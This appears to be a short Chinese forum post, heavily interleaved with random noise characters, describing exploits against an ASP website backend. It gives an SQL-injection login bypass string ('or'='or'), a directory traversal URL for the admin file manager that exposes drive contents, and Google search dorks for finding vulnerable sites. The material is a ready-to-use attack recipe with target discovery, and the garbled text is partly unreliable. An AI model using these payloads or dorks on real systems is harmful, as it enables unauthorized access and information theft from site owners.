后台万能密码 'or'='or': K4 J% D9 N$ W) Q6 n% u# v
# f G0 [4 g! K5 I
后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
& V3 g" T! A, Q/ C% H* {admin/uploadfile.asp?currentFolder=/upfiles/../
+ q% ~% E }+ @1 h- o9 i
" @! ^. ]# r3 ~& s漏洞证明:
" j( \( M" @% {1 N7 O& c) w3 \' K% }' Q! c
谷歌:inurl:type.asp?id=1 新闻中心6 D4 T g+ e2 D
或者 :inurl:download_ok.asp?6 N% a( @/ _1 T+ s9 X
) o+ _3 E2 z9 Z9 I% Y; q1 L+ w
|